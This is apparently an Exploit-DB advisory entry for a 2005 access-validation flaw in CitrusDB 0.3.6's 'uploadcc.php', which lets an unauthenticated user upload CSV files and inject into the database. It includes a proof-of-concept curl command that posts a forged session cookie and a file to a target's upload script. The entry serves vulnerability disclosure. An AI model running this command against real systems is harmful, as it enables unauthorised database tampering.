Lucene search

K
exploitdbRedTeam PentestingEDB-ID:25100
HistoryFeb 15, 2005 - 12:00 a.m.

CitrusDB 0.3.6 - 'uploadcc.php' Arbitrary Database Injection

2005-02-1500:00:00
RedTeam Pentesting
www.exploit-db.com
12

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/12557/info
 
CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import.
 
These issues are reported to affect CitrusDB 0.3.6; earlier versions may also be affected.

curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form
[email protected] --form Import=Import 

AI Score

7.4

Confidence

Low